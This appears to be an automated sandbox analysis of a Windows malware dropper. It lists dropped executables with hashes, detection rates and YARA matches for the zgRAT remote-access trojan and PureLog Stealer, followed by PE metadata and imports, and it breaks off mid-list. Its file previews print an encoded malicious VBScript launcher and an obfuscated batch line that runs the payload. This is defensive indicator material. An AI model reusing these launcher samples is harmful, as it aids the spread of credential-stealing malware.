                                                                                                  Process:C:\Recovery\RuntimeBroker.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):32256
                                                                                                  Entropy (8bit):5.631194486392901
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                                  Process:C:\Recovery\RuntimeBroker.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):342528
                                                                                                  Entropy (8bit):6.170134230759619
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                                  Process:C:\savesSession\ComponentBrokermonitor.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):342528
                                                                                                  Entropy (8bit):6.170134230759619
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                                  Process:C:\Recovery\RuntimeBroker.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):294912
                                                                                                  Entropy (8bit):6.010605469502259
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                                  MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                                  SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                                  SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                                  SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                  Process:C:\savesSession\ComponentBrokermonitor.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):294912
                                                                                                  Entropy (8bit):6.010605469502259
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                                  MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                                  SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                                  SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                                  SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                                                  Process:C:\Recovery\RuntimeBroker.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):70144
                                                                                                  Entropy (8bit):5.909536568846014
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                                                                  Process:C:\savesSession\ComponentBrokermonitor.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):32256
                                                                                                  Entropy (8bit):5.631194486392901
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                                                  Process:C:\Recovery\RuntimeBroker.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):46592
                                                                                                  Entropy (8bit):5.870612048031897
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                                                                  Process:C:\Users\user\Desktop\voed9G7p5s.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):101
                                                                                                  Entropy (8bit):5.203244062944359
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:j1ySkvAlUoLjpRDMWnxL9KIkL4Wy31TS3kq:hcAlUoLjptNmkJZS3j
                                                                                                  MD5:1EBA7659F62BB9C919655CF6F61CFED6
                                                                                                  SHA1:6429AA715B66CADE15985BC398E11662CA8170E3
                                                                                                  SHA-256:B654761DC1E242F04CAFE2BF17B7DA13CD0AD9112807601FF5681AF78D5B03BA
                                                                                                  SHA-512:E201DB8B0F6899085A1FC10189776D98D39A31590A0D2062CA08807F5C85B6106CA891615FCFE9EB454E48D4E5C28A3C3D248E0514F0E372D0A3EB2FD188E645
                                                                                                  Malicious:false
                                                                                                  Preview:%cHb%%ZMeTnwoghhYcUy%..%GsJwvtEHxlicfpt%"C:\savesSession/ComponentBrokermonitor.exe"%OWGqRLnvFKRWRGS%
                                                                                                  Process:C:\Users\user\Desktop\voed9G7p5s.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):237
                                                                                                  Entropy (8bit):5.920793171672686
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6:Gz2wqK+NkLzWbHhE18nZNDd3RL1wQJR6v8k9BGnWqO1:GPMCzWLy14d3XBJEUk9BwWqO1
                                                                                                  MD5:11977EA8AE3C14C4B77D75EAA2D7C5C9
                                                                                                  SHA1:7B2CEDBCB84A67F59AA2DC8F15C34D6F7B319AE6
                                                                                                  SHA-256:3B7944A7F022ED2A76B4839375BB124FB755D6DAE804715236C8C8FB028D8FF4
                                                                                                  SHA-512:8B8C9B260CE092851D16A25369372D1545D9B4FF1719A3A8918EF6A4A5F94AB88D14EA3799E8D8289AA70697AC472347B03F5FBA055465F624FBA4EB3EFD0EA4
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  Preview:#@~^1AAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v%T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJ/C7+k?+k/bGxJz*wjy3#n047VZA9,$ed+M&.!aqh4:KKC$Pfqr;Lh\\Kek4tGc8mYEBPZ~P6l^d+f0QAAA==^#~@.
                                                                                                  Process:C:\Users\user\Desktop\voed9G7p5s.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2751488
                                                                                                  Entropy (8bit):7.727823728421607
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:49152:QAkaLFN8C62dt9FLvRza00IB4Ipg/DCDYjrMmkZHN0qmt12L:QAkaLN62H9JRza0neIpg/eEjrMmbqW2L
                                                                                                  MD5:43D19D8B3DF29BDFB6AB0D58C3E64424
                                                                                                  SHA1:7726A5D9634749D08E43BF4871B517850D10EE65
                                                                                                  SHA-256:BFC2532FBC133EB2FBDD1C4108084CCB0478FBE6389A9830EF6D9E0E83EA4C38
                                                                                                  SHA-512:44B5DA3EF8844D6B4149058881E8888B45F5CFC52BCB81EA694BA250FF51ADA7538C6085A5F1F07254145B1998453CBD43DE8A941F1A7DB79C40D12EBF97EA9B
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\savesSession\ComponentBrokermonitor.exe, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\savesSession\ComponentBrokermonitor.exe, Author: Joe Security
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 55%
                                                                                                  Process:C:\savesSession\ComponentBrokermonitor.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):93
                                                                                                  Entropy (8bit):5.269921176513327
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:nbtMSG1nTcuAnWHZXDtFjCWM7r4GYzTx16n:nBMSOTcu9HZTtFjRM7Ci
                                                                                                  MD5:69ABFCF0FB0C024E53D3151F788C5D82
                                                                                                  SHA1:729D27974C1FFC0DB7F70F9A68FBB503ED1EA125
                                                                                                  SHA-256:16CFB2DDFBA353D5504D4F0B100BBEF4CF612348C501D9F57443D82CC0D9500D
                                                                                                  SHA-512:D3AF9D2A1D893761515454385809A4CA517B443AAA402A4F766D4801F5A98792022D1B0E1EC4166171F99EB648D38BF69F177BEFDE4D632C9922A1F1A9F983B7
                                                                                                  Malicious:false
                                                                                                  Preview:MDS5kqrKvRZvpoT1NbBhv1c7zDFB6yO0eBbe65fLmTZbruB5gahNFjTUkVFgkpN7CiRnNz5S6z4cbAPFBKffRBv4rG3k0
                                                                                                  Process:C:\savesSession\ComponentBrokermonitor.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2751488
                                                                                                  Entropy (8bit):7.727823728421607
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:49152:QAkaLFN8C62dt9FLvRza00IB4Ipg/DCDYjrMmkZHN0qmt12L:QAkaLN62H9JRza0neIpg/eEjrMmbqW2L
                                                                                                  MD5:43D19D8B3DF29BDFB6AB0D58C3E64424
                                                                                                  SHA1:7726A5D9634749D08E43BF4871B517850D10EE65
                                                                                                  SHA-256:BFC2532FBC133EB2FBDD1C4108084CCB0478FBE6389A9830EF6D9E0E83EA4C38
                                                                                                  SHA-512:44B5DA3EF8844D6B4149058881E8888B45F5CFC52BCB81EA694BA250FF51ADA7538C6085A5F1F07254145B1998453CBD43DE8A941F1A7DB79C40D12EBF97EA9B
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\savesSession\winlogon.exe, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\savesSession\winlogon.exe, Author: Joe Security
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 55%
                                                                                                  Process:C:\Windows\System32\w32tm.exe
                                                                                                  File Type:ASCII text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):151
                                                                                                  Entropy (8bit):4.7299548951916774
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:VLV993J+miJWEoJ8FXANtaSXSa0XXKvrANvj:Vx993DEUtNYXV
                                                                                                  MD5:3AADB5D26D7401515EEB860E2B40EF42
                                                                                                  SHA1:DDC12E05AB6C5CEC73E3BE175D19DE6040BDF279
                                                                                                  SHA-256:EEEB4E9EB028764EB8C0A2B7C0F68B6B9ED0FF89155B5313B0A9B04874CE34D4
                                                                                                  SHA-512:07E2E5C86D4FC040B726232D4F16684BCAC176E402CA9A1CC7E67A0133DC3F859D0BDF81C105A646CD4827BF5CD66BC041CEFEF10A63A7894355369A1C2CC6B6
                                                                                                  Malicious:false
                                                                                                  Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 31/12/2024 21:27:27..21:27:27, error: 0x80072746.21:27:32, error: 0x80072746.
                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Entropy (8bit):7.630053256762277
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                  File name:voed9G7p5s.exe
                                                                                                  File size:2'342'562 bytes
                                                                                                  MD5:0e22e05075402fd6fc2f0a833d49c288
                                                                                                  SHA1:eb40fec691901a96a77df716902f04ddc3debf24
                                                                                                  SHA256:e232d303d7c90ed82cc677f170e466159d2ffbf3aad45a225cc545e9efb8cf07
                                                                                                  SHA512:b6acf7f3dd08255ca922ea6c943141bd68740269512ed1b48668d2933b7df95fb3516dd8b364ca41e90cfc2f637be3b32c4c8e5ee0a9da9a014a8cdfc0b2bd7b
                                                                                                  SSDEEP:49152:aBcyY62DYzvkfHuJ6Q7f0Tvg48N6XF3xTROCNaRtfB:ccylsYzvG9DZJRDNaR3
                                                                                                  TLSH:94B501D0B5F50876EC221B3726366E37D53ABE2C2A74C6CF5384A554BB631C187326A3
                                                                                                  Icon Hash:04b06c6c6c7c1b64
                                                                                                  Entrypoint:0x41f530
                                                                                                  Entrypoint Section:.text
                                                                                                  Digitally signed:false
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                  Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                                                                  TLS Callbacks:
                                                                                                  CLR (.Net) Version:
                                                                                                  OS Version Major:5
                                                                                                  OS Version Minor:1
                                                                                                  File Version Major:5
                                                                                                  File Version Minor:1
                                                                                                  Subsystem Version Major:5
                                                                                                  Subsystem Version Minor:1
                                                                                                  Import Hash:12e12319f1029ec4f8fcbed7e82df162
                                                                                                  Instruction
                                                                                                  call 00007FC61CB6056Bh
                                                                                                  jmp 00007FC61CB5FE7Dh
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  push esi
                                                                                                  push dword ptr [ebp+08h]
                                                                                                  mov esi, ecx
                                                                                                  call 00007FC61CB52CC7h
                                                                                                  mov dword ptr [esi], 004356D0h
                                                                                                  mov eax, esi
                                                                                                  pop esi
                                                                                                  pop ebp
                                                                                                  retn 0004h
                                                                                                  and dword ptr [ecx+04h], 00000000h
                                                                                                  mov eax, ecx
                                                                                                  and dword ptr [ecx+08h], 00000000h
                                                                                                  mov dword ptr [ecx+04h], 004356D8h
                                                                                                  mov dword ptr [ecx], 004356D0h
                                                                                                  ret
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  push esi
                                                                                                  mov esi, ecx
                                                                                                  lea eax, dword ptr [esi+04h]
                                                                                                  mov dword ptr [esi], 004356B8h
                                                                                                  push eax
                                                                                                  call 00007FC61CB6330Fh
                                                                                                  test byte ptr [ebp+08h], 00000001h
                                                                                                  pop ecx
                                                                                                  je 00007FC61CB6000Ch
                                                                                                  push 0000000Ch
                                                                                                  push esi
                                                                                                  call 00007FC61CB5F5C9h
                                                                                                  pop ecx
                                                                                                  pop ecx
                                                                                                  mov eax, esi
                                                                                                  pop esi
                                                                                                  pop ebp
                                                                                                  retn 0004h
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  sub esp, 0Ch
                                                                                                  lea ecx, dword ptr [ebp-0Ch]
                                                                                                  call 00007FC61CB52C42h
                                                                                                  push 0043BEF0h
                                                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                                                  push eax
                                                                                                  call 00007FC61CB62DC9h
                                                                                                  int3
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  sub esp, 0Ch
                                                                                                  lea ecx, dword ptr [ebp-0Ch]
                                                                                                  call 00007FC61CB5FF88h
                                                                                                  push 0043C0F4h
                                                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                                                  push eax
                                                                                                  call 00007FC61CB62DACh
                                                                                                  int3
                                                                                                  jmp 00007FC61CB64847h
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  int3
                                                                                                  push 00422900h
                                                                                                  push dword ptr fs:[00000000h]
                                                                                                  Programming Language:
                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                  • [IMP] VS2008 SP1 build 30729

| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3d070 | 0x34 | .rdata |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3d0a4 | 0x50 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x64000 | 0x5efcc | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc3000 | 0x233c | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3b11c | 0x54 | .rdata |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x355f8 | 0x40 | .rdata |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x33000 | 0x278 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3c5ec | 0x120 | .rdata |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x31bdc | 0x31c00 | 2831bb8b11e3209658a53131886cdf98 | False | 0.5909380888819096 | data | 6.712962136932442 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x33000 | 0xaec0 | 0xb000 | 042f11346230ca5aa360727d9908e809 | False | 0.4579190340909091 | data | 5.261605615899847 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0x3e000 | 0x24720 | 0x1000 | 9670b581969e508258d8bc903025de5e | False | 0.451416015625 | data | 4.387459135575936 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .didat | 0x63000 | 0x190 | 0x200 | c83554035c63bb446c6208d0c8fa0256 | False | 0.4453125 | data | 3.3327310103022305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x64000 | 0x5efcc | 0x5f000 | 9b920497ac5f6a5786e8cc2d9ea75036 | False | 0.10043688322368421 | data | 3.4827917074528 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0xc3000 | 0x233c | 0x2400 | 40b5e17755fd6fdd34de06e5cdb7f711 | False | 0.7749565972222222 | data | 6.623012966548067 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| PNG | 0x64614 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528 |
| PNG | 0x6515c | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495 |
| RT_ICON | 0x66708 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 262144, resolution 3779 x 3779 px/m | | | 0.0664593011214013 |
| RT_ICON | 0xa8730 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 3779 x 3779 px/m | | | 0.07625990772506802 |
| RT_ICON | 0xb8f58 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 3779 x 3779 px/m | | | 0.09429617383089277 |
| RT_ICON | 0xbd180 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m | | | 0.1113070539419087 |
| RT_ICON | 0xbf728 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m | | | 0.14587242026266417 |
| RT_ICON | 0xc07d0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3779 x 3779 px/m | | | 0.25 |
| RT_DIALOG | 0xc0c38 | 0x286 | data | English | United States | 0.5092879256965944 |
| RT_DIALOG | 0xc0ec0 | 0x13a | data | English | United States | 0.60828025477707 |
| RT_DIALOG | 0xc0ffc | 0xec | data | English | United States | 0.6991525423728814 |
| RT_DIALOG | 0xc10e8 | 0x12e | data | English | United States | 0.5927152317880795 |
| RT_DIALOG | 0xc1218 | 0x338 | data | English | United States | 0.45145631067961167 |
| RT_DIALOG | 0xc1550 | 0x252 | data | English | United States | 0.5757575757575758 |
| RT_STRING | 0xc17a4 | 0x1e2 | data | English | United States | 0.3900414937759336 |
| RT_STRING | 0xc1988 | 0x1cc | data | English | United States | 0.4282608695652174 |
| RT_STRING | 0xc1b54 | 0x1b8 | data | English | United States | 0.45681818181818185 |
| RT_STRING | 0xc1d0c | 0x146 | data | English | United States | 0.5153374233128835 |
| RT_STRING | 0xc1e54 | 0x46c | data | English | United States | 0.3454063604240283 |
| RT_STRING | 0xc22c0 | 0x166 | data | English | United States | 0.49162011173184356 |
| RT_STRING | 0xc2428 | 0x152 | data | English | United States | 0.5059171597633136 |
| RT_STRING | 0xc257c | 0x10a | data | English | United States | 0.49624060150375937 |
| RT_STRING | 0xc2688 | 0xbc | data | English | United States | 0.6329787234042553 |
| RT_STRING | 0xc2744 | 0xd6 | data | English | United States | 0.5747663551401869 |
| RT_GROUP_ICON | 0xc281c | 0x5a | data | | | 0.7666666666666667 |
| RT_MANIFEST | 0xc2878 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333 |

| DLL | Import |
|---|---|
| KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, 